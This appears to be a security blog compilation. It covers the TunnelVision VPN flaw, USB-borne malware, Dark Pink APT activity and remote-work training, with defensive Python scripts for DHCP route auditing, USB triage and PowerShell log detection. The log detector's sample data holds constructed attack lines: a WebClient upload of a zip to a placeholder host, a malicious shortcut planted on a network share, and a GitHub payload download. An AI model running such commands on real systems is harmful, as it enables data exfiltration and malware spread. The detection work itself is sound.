
Unpatchable VPN Vulnerability Exposes Data to Attackers: What You Need to Know


In a recent revelation that has sent shockwaves through the cybersecurity community, researchers have unearthed a significant vulnerability in virtual private networks (VPNs) dubbed TunnelVision. This flaw, described as deep and unpatchable, poses a substantial threat to data security, allowing malicious actors to intercept sensitive information without leaving a trace. The implications of this discovery are profound, shedding light on the inherent limitations of VPNs as a stand-alone security solution and underscoring the urgent need for a more robust and comprehensive approach to cybersecurity. 

By manipulating DHCP option 121, attackers can reroute data traffic within the encrypted VPN tunnel to a malicious gateway under their control. This interception occurs stealthily, without triggering any alarms or alerts, as the VPN software remains unaware that its contents have been rerouted. Consequently, organizations may remain oblivious to the breach until it's too late, allowing threat actors to siphon off data undetected. 

What makes TunnelVision particularly insidious is its ability to evade detection by traditional security measures. Unlike conventional attacks that leave behind telltale signs of intrusion, TunnelVision operates covertly within the encrypted VPN tunnel, making it virtually invisible to standard intrusion detection systems and VPN monitoring tools. As a result, organizations may be blindsided by the breach, unaware that their data is being compromised until it's too late to take action. 

The discovery of TunnelVision has profound implications for organizations that rely on VPNs to secure their networks and safeguard sensitive information. It exposes the inherent vulnerabilities of VPNs as a single point of failure in the security infrastructure, highlighting the need for a more holistic and layered approach to cybersecurity. Simply put, VPNs were never designed to serve as a comprehensive security solution; they are merely a means of establishing encrypted connections between remote users and corporate networks. 

To mitigate the risks posed by TunnelVision and similar vulnerabilities, organizations must adopt a multifaceted cybersecurity strategy that encompasses strong encryption, enhanced network monitoring, and a zero-trust security model. By encrypting data before it enters the VPN tunnel, organizations can ensure that even if intercepted, the data remains protected from prying eyes. Additionally, implementing rigorous network monitoring protocols can help detect and respond to anomalous behaviour indicative of a breach. 

Moreover, embracing a zero-trust security model, which assumes that no entity—whether inside or outside the network perimeter—is inherently trustworthy, can help organizations better defend against sophisticated attacks like TunnelVision. The discovery of TunnelVision serves as a wake-up call for organizations to reevaluate their cybersecurity posture and adopt a more proactive and comprehensive approach to threat mitigation. By addressing the underlying vulnerabilities in VPNs and implementing robust security measures, organizations can better protect their sensitive data and safeguard against emerging threats in an increasingly hostile digital landscape.
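Since the attack hinges on DHCP option 121 (classless static routes, RFC 3442), one concrete monitoring step is to decode that option from DHCP offers seen on the wire and flag routes whose next hop is not a router the operator knows, or whose prefix is broad enough to take precedence over a VPN's default route. The script below is an added example written for this post, not code from the researchers or any VPN vendor; the option parsing follows the public DHCP and RFC 3442 formats, and the sample offer bytes, the trusted router 192.168.1.1 and the "broad prefix" threshold of /8 are constructed assumptions for the demonstration.

```python
import ipaddress

# Routes with a prefix shorter than this cover far more address space than any
# ordinary on-link or site route, so they deserve a look even from a known router.
# (Threshold is an assumption for this example; tune it to your network.)
BROAD_PREFIX = 8


def parse_dhcp_options(blob: bytes) -> dict:
    """Walk the DHCP option area (the bytes after the magic cookie) and return
    {option_code: value}. Pads (0) are skipped, End (255) stops the walk, and a
    repeated option code is concatenated as RFC 3396 requires."""
    opts = {}
    i = 0
    while i < len(blob):
        code = blob[i]
        if code == 0:            # pad
            i += 1
            continue
        if code == 255:          # end
            break
        if i + 1 >= len(blob):
            raise ValueError("option %d has no length byte" % code)
        length = blob[i + 1]
        value = blob[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("option %d is truncated" % code)
        opts[code] = opts.get(code, b"") + value
        i += 2 + length
    return opts


def parse_classless_routes(data: bytes) -> list:
    """Decode RFC 3442 option 121 into (IPv4Network, IPv4Address) pairs.
    Each entry is: 1 byte prefix length, ceil(prefix/8) significant octets of
    the destination, then the 4-byte router address."""
    routes = []
    i = 0
    while i < len(data):
        plen = data[i]
        if plen > 32:
            raise ValueError("bad prefix length %d" % plen)
        n = (plen + 7) // 8
        dest = data[i + 1:i + 1 + n]
        router = data[i + 1 + n:i + 5 + n]
        if len(dest) != n or len(router) != 4:
            raise ValueError("truncated route entry at offset %d" % i)
        dest_addr = ipaddress.IPv4Address(dest.ljust(4, b"\x00"))
        net = ipaddress.ip_network("%s/%d" % (dest_addr, plen), strict=False)
        routes.append((net, ipaddress.IPv4Address(router)))
        i += 5 + n
    return routes


def audit_dhcp_options(blob: bytes, trusted_routers) -> list:
    """Return (destination, gateway, reasons) for every option 121 route whose
    next hop is not one of the operator-supplied trusted routers, or whose
    prefix is broad enough to pull large ranges away from the VPN's default
    route. Trust is deliberately NOT taken from option 3 (router) in the same
    message: a rogue DHCP server controls that field too."""
    trusted = {ipaddress.IPv4Address(r) for r in trusted_routers}
    findings = []
    for net, gw in parse_classless_routes(parse_dhcp_options(blob).get(121, b"")):
        reasons = []
        if gw not in trusted:
            reasons.append("next hop %s is not a known router" % gw)
        if net.prefixlen < BROAD_PREFIX:
            reasons.append("/%d route covers %d addresses and takes precedence "
                           "over a default route" % (net.prefixlen, net.num_addresses))
        if reasons:
            findings.append((str(net), str(gw), reasons))
    return findings


# Constructed DHCPOFFER option area (hex, after the magic cookie); not a capture:
#   53 len 1   DHCPOFFER
#    3 len 4   router 192.168.1.1
#  121 len 13  0.0.0.0/1 via 192.168.1.66 ; 10.10.0.0/16 via 192.168.1.1
#  255         end
SAMPLE_OFFER_OPTIONS = bytes.fromhex(
    "35 01 02"
    "03 04 c0 a8 01 01"
    "79 0d" "01 00 c0 a8 01 42" "10 0a 0a c0 a8 01 01"
    "ff"
)

if __name__ == "__main__":
    for dest, gw, reasons in audit_dhcp_options(SAMPLE_OFFER_OPTIONS, ["192.168.1.1"]):
        print("%-14s via %-14s %s" % (dest, gw, "; ".join(reasons)))
```

Feed it the option bytes from a DHCP OFFER captured on the client's access network (for example from a packet capture or a DHCP client hook) and compare the routes it reports against the routes the VPN client actually installed; the benign 10.10.0.0/16 route via the known router produces no finding, while the /1 route via an unknown gateway is reported with both reasons.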

Sharp Increase in Malware Attacks via USB Flash Drives


Instances of cybercriminals employing USB drives for malware attacks have seen a significant rise. According to security researchers from Mandiant, there has been a three-fold increase in malware attacks via USB drives aimed at stealing sensitive information during the first half of 2023. These researchers have disclosed details regarding two specific attack campaigns.

One of the attack campaigns, attributed to the China-linked cyberespionage group TEMP.Hex, targeted both public and private organizations in Europe, Asia, and the U.S. The attackers utilized USB flash drives to introduce the SOGU malware into compromised systems and extract valuable data. 

The flash drives contained multiple malicious files and employed a DLL hijacking technique to load the final payload into the memory of the compromised systems. Once executed, the SOGU malware carried out various actions such as capturing screenshots, recording keystrokes, establishing reverse shell connections, and enabling remote desktop connections for executing additional files.

The stolen data was sent to the attackers' command and control (C2) server using a custom binary protocol over TCP, UDP, or ICMP. Industries targeted by this attack campaign included construction, engineering, government, manufacturing, retail, media, and pharmaceutical sectors.

In the second attack campaign, victims were enticed to click on a file that appeared to be a legitimate executable in the root folder of a USB drive. Executing this file triggered an infection chain that led to the download of a shellcode-based backdoor named SNOWYDRIVE.

The malware not only copied itself to removable drives connected to infected systems but also performed various other operations, such as writing or deleting files, initiating file uploads, and executing reverse shell commands.

Recently, the Check Point Research Team uncovered a new USB-based attack campaign attributed to a China-based group called Camaro Dragon. 

The campaign specifically targeted a healthcare institution in Europe and involved the deployment of several updated versions of malware toolsets, including WispRider and HopperTick. It was reported that Camaro Dragon effectively utilized USB drives to launch attacks in Myanmar, South Korea, Great Britain, India, and Russia.

Organizations are strongly advised to prioritize access restrictions on USB devices and conduct comprehensive scans for malicious files before connecting them to their networks. 

Additionally, it is crucial for organizations to enhance their awareness and understanding of such attack campaigns in order to proactively defend against threats from the outset. This can be achieved by implementing a robust and automated Threat Intelligence Platform (TIP) that provides real-time tactical and technical insights into attacks.
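Both campaigns rely on the same lure layout: something in the root of a removable drive that looks like a document or folder but is actually an executable or a shortcut. The following is an added example (not code from Mandiant, Check Point or the malware authors) of a small triage routine that reviews a drive's root listing before the drive is connected to a production host; the file names in the sample listing are constructed, and the extension lists and the allow-list of Windows-created hidden directories are assumptions to adjust for your environment.

```python
import os
import stat
from dataclasses import dataclass

# Extensions Windows runs when double-clicked (assumed list, extend as needed).
EXEC_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd",
            ".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta"}
# Extensions a lure borrows so that "Report.pdf.exe" reads as a document.
DOC_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx",
           ".jpg", ".png", ".txt"}
# Hidden directories Windows itself creates on removable media.
BENIGN_HIDDEN_DIRS = {"system volume information", "$recycle.bin"}


@dataclass
class Entry:
    name: str            # name as it appears in the drive root
    is_dir: bool
    hidden: bool = False  # hidden or system attribute set


def triage_root_entries(entries):
    """Return [(name, [reasons])] for root entries matching the lure patterns
    described in the post: executables or shortcuts placed in the drive root,
    document-style double extensions, executables named after a directory on
    the same drive (the folder is usually hidden), and unexpected hidden dirs."""
    dir_names = {e.name.lower() for e in entries if e.is_dir}
    findings = []
    for e in entries:
        lower = e.name.lower()
        reasons = []
        if e.is_dir:
            if e.hidden and lower not in BENIGN_HIDDEN_DIRS:
                reasons.append("hidden directory in drive root")
        else:
            stem, ext = os.path.splitext(lower)
            if ext == ".lnk":
                reasons.append("shortcut in drive root")
            elif ext in EXEC_EXT:
                reasons.append("executable in drive root")
                if os.path.splitext(stem)[1] in DOC_EXT:
                    reasons.append("document-style double extension")
                if stem in dir_names:
                    reasons.append("shares its name with a directory on the drive")
                if e.hidden:
                    reasons.append("hidden")
        if reasons:
            findings.append((e.name, reasons))
    return findings


def read_root_entries(path):
    """Build Entry objects for a real drive root such as 'E:\\'. The hidden
    flag comes from st_file_attributes on Windows; elsewhere only dotfiles
    count as hidden."""
    entries = []
    with os.scandir(path) as it:
        for d in it:
            attrs = getattr(d.stat(follow_symlinks=False), "st_file_attributes", 0)
            hidden = bool(attrs & (stat.FILE_ATTRIBUTE_HIDDEN | stat.FILE_ATTRIBUTE_SYSTEM))
            entries.append(Entry(d.name, d.is_dir(follow_symlinks=False),
                                 hidden or d.name.startswith(".")))
    return entries


# Constructed root listing of a suspicious drive (not a real sample).
SAMPLE_ROOT = [
    Entry("System Volume Information", True, True),   # normal on Windows
    Entry("Invoices", True, True),                    # real folder, hidden
    Entry("Invoices.exe", False, False),              # lure named after it
    Entry("Report.pdf.exe", False, False),
    Entry("Photos.lnk", False, False),
    Entry("notes.txt", False, False),
]

if __name__ == "__main__":
    for name, reasons in triage_root_entries(SAMPLE_ROOT):
        print("%-28s %s" % (name, "; ".join(reasons)))
```

Run `triage_root_entries(read_root_entries("E:\\"))` from an isolated scanning station; anything it reports is a reason to image the drive rather than open it. The triage is deliberately about layout rather than file content, so it complements, not replaces, the antivirus scan the post recommends.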

Government and Military Institutions Under Persistent Attacks by Dark Pink Hackers


In 2023, the Dark Pink APT group has been spotted targeting government, military, and education organisations in Indonesia, Brunei, and Vietnam. The threat group has been active since at least mid-2021, primarily targeting companies in the Asia-Pacific region, and was first publicly documented in a Group-IB report in January 2023.

After analyzing indicators of earlier activity by the threat actor, the researchers identified further breaches against an educational institute in Belgium and a military entity in Thailand. One of the PowerShell scripts used by the group is essential to Dark Pink's lateral movement approach, assisting in the identification of, and interaction with, SMB shares on the network.

The script downloads a ZIP archive from GitHub, saves it to a local directory, and then creates LNK files on each SMB share that point to the malicious executable contained in the package. When these LNK files are opened, the malicious executable is launched, accelerating Dark Pink's spread across the network and extending its reach to new systems.

Dark Pink also employs PowerShell instructions to detect the existence of legitimate software and development tools on the infected device, which they can then exploit.

These tools include 'AccCheckConsole.exe', 'remote.exe', 'Extexport.exe', 'MSPUB.exe', and 'MSOHTMED.exe', all of which can be used for proxy execution, downloading additional payloads, and other malicious activities.

However, Group-IB states that it has not seen any instances of these tools being abused in the detected assaults. As per Group-IB, Dark Pink's data exfiltration mechanism has evolved beyond simply sending ZIP archives to Telegram conversations.

The attackers used Dropbox uploads in some circumstances, while in others they used HTTP exfiltration via a temporary endpoint built with the "Webhook.site" service or via Windows servers.

The previously described scripts can also exfiltrate data: after locating the target files on the compromised computer, they create new WebClient objects and use the HTTP PUT method to transfer the files to an external address.

Group-IB assesses that the Dark Pink threat actors have not been deterred by their past exposure and are unlikely to change their ways now. The attackers will almost certainly continue to improve their tools and diversify their approaches as much as possible.
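Every behaviour this post attributes to the scripts (share discovery, a ZIP pulled from GitHub, LNK files written to UNC paths, probing for the listed executables, WebClient uploads) is visible in PowerShell script block logging (Event ID 4104) when it is enabled. The detector below is an added example for this post, not Group-IB's tooling; it runs a small rule set over constructed 4104 records in a simplified `eventid|host|script` text form, and the rule weights, the example host name WS01 and the placeholder URLs (example-org repo, webhook.example.invalid) are assumptions for the demonstration.

```python
import re

# Each rule: name, weight, and the regexes that must ALL match one script block.
# Weights are an assumption for this example; a share listing alone is routine
# admin work, a shortcut written to a UNC path from PowerShell is not.
RULES = [
    ("webclient_upload",    3, [r"Net\.WebClient", r"\.Upload(File|Data|String|Values)\s*\("]),
    ("lnk_on_share",        4, [r"CreateShortcut\s*\(", r"\\\\[^\s'\"]+\.lnk"]),
    ("archive_from_github", 2, [r"github\.com/\S+\.zip", r"Expand-Archive|ZipFile"]),
    ("lolbin_probe",        2, [r"\b(AccCheckConsole|remote|Extexport|MSPUB|MSOHTMED)\.exe\b"]),
    ("share_enum",          1, [r"Get-SmbShare|Get-SmbMapping|\bnet\s+view\b"]),
]


def parse_event(line):
    """Split the simplified 'eventid|host|script' record; the script text may
    itself contain pipes, so only the first two separators are used."""
    event_id, host, script = line.split("|", 2)
    return {"event_id": int(event_id), "host": host, "script": script}


def match_rules(script):
    """Return [(rule_name, weight)] for every rule whose patterns all match."""
    return [(name, weight) for name, weight, pats in RULES
            if all(re.search(p, script, re.IGNORECASE) for p in pats)]


def scan_script_blocks(lines):
    """Evaluate each 4104 record and return the ones that matched at least one
    rule, with the matched rule names and the summed score."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = parse_event(line)
        if ev["event_id"] != 4104:
            continue
        matched = match_rules(ev["script"])
        if matched:
            hits.append({"host": ev["host"],
                         "rules": [n for n, _ in matched],
                         "score": sum(w for _, w in matched),
                         "script": ev["script"]})
    return hits


def host_scores(lines):
    """Aggregate scores per host so that several low-weight steps of the same
    chain on one machine still add up to something worth a look."""
    totals = {}
    for h in scan_script_blocks(lines):
        totals[h["host"]] = totals.get(h["host"], 0) + h["score"]
    return totals


# Constructed script block records (not real telemetry); URLs are placeholders.
SAMPLE_LOG = r"""
4104|WS01|Get-ChildItem -Path C:\Reports | Sort-Object Length
4104|WS01|Get-SmbShare | Where-Object { $_.Path } | Select-Object Name,Path
4104|WS01|Invoke-WebRequest 'https://github.com/example-org/example-repo/archive/main.zip' -OutFile 'C:\Users\Public\p.zip'; Expand-Archive 'C:\Users\Public\p.zip' 'C:\Users\Public\p'
4104|WS01|$ws = New-Object -ComObject WScript.Shell; $lnk = $ws.CreateShortcut('\\FS01\Public\OpenMe.lnk'); $lnk.TargetPath = 'C:\Users\Public\p\update.exe'; $lnk.Save()
4104|WS01|foreach ($t in 'AccCheckConsole.exe','MSOHTMED.exe') { Get-Command $t -ErrorAction SilentlyContinue }
4104|WS01|$wc = New-Object System.Net.WebClient; $wc.UploadFile('https://webhook.example.invalid/u', 'PUT', 'C:\Users\Public\out.zip')
"""

if __name__ == "__main__":
    for h in scan_script_blocks(SAMPLE_LOG.splitlines()):
        print("%-5s %-20s score=%d" % (h["host"], ",".join(h["rules"]), h["score"]))
    print(host_scores(SAMPLE_LOG.splitlines()))
```

The first record (a directory listing) matches nothing, the share enumeration alone scores only 1, but the six records together put WS01 at 12, which is the pattern the post describes: discovery, staging from GitHub, shortcuts dropped on shares, and an HTTP PUT upload in quick succession on one host.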

One in Three Companies Holds off on Giving Cybersecurity Training to Remote Workers

In a report from Hornetsecurity, the leading cybersecurity provider, it has been found that 33% of businesses do not provide cybersecurity awareness training to employees working remotely. 

According to the study, nearly three-quarters (74%) of remote staff have access to critical data, which means that upcoming hybrid workplaces will create a higher risk of security breaches and more risky behavior on the part of companies.  

Although there are several challenges currently, such as an insufficient number of training programs and employees feeling unprepared, almost half (44%) of respondents report that their organization intends to increase the number of employees working remotely in the coming months. 

Hornetsecurity's CEO, Daniel Hofmann, said that hybrid work has become more popular and that, given the risks that come with it, companies should place a high priority on training and educating employees to ensure that remote working is secure. He added that traditional methods of controlling and securing company data do not work as effectively when employees work from off-site locations, so a large amount of responsibility falls on the individual, and companies must recognize the unique security risks associated with remote work.

Additionally, companies should activate appropriate security management systems and empower their employees to deal with the level of risk associated with remote work.  

Threats and Challenges 

The report is based on an independent survey of 925 IT professionals and business owners from a range of business types and sizes around the world. It found that the vast majority of employees face cybersecurity risks, as well as security management challenges, while working remotely.

According to research, two main problems pose risks to organizations. First, employees have access to critical data. However, they are not provided with sufficient training on how to manage cybersecurity activities or how to reduce the risk of a cyberattack or a breach. 

It is particularly pertinent for companies to take additional steps to improve remote working cybersecurity in the current climate, because cybercriminals are becoming more sophisticated and are using remote working as a weapon. Unsurprisingly, employees have seen a significant increase in smartphone attacks over the past few years, as attackers have learned that both professional and personal data can be reached on a device people can, and often do, use for work.

Concerns Regarding Remote Working Security  

Companies have adapted to the latest methods of working, but the cybersecurity risks associated with remote working have not been addressed. Providing basic training could make a significant difference in the way companies fight cybercrime; Hornetsecurity's Security Awareness Training, for instance, is intended to help corporations build their human firewalls.

Managed endpoints are used for many purposes, and powerful systems must be in place to ensure that employees are protected from threats. The study found that endpoint compromise (28%) and compromised credentials (28%) were the most common sources of cybersecurity incidents, and a further 15% of employees said they used their own devices, with some endpoint configuration, for remote work. For robust remote cybersecurity, it is clear that both security awareness training and the implementation of endpoint management systems are necessary.